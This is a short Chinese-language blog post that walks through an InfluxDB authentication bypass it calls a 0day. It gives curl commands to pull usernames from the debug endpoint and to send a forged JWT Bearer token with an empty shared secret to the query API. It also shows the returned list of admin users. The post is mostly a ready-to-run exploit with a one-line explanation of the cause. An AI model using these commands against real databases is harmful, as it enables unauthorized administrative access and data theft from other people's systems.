登陆 注册

influxdb认证绕过0day

a02845 2019-06-05 jwt token0dayinfluxdb

0day复现步骤:

1. 查找user name

curl -G "http://xxx:8086/debug/requests"

2. 构造jwt token

在线构造地址

jwt_token

3. 构造认证头

curl -G 'http://xxx:8086/query' --data-urlencode 'q=show users' -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNTU5Mjg0OTM1fQ.tUClNot9LgStSw57n26DSn-3NPkBiHizk-XOHMfJJJw'

返回

{"results":[{"statement_id":0,"series":[{"columns":["user","admin"],"values":[["admin",true],["read",false],["write",false],["telegraf",true]]}]}]}

成功

漏洞原理

JWT token shared-secret 默认为空

JWT说明

0day原文

生成海报
请发表您的评论
1文章数 0评论数
最近文章
请关注微信公众号
微信二维码
不容错过
Powered By SangYun.Net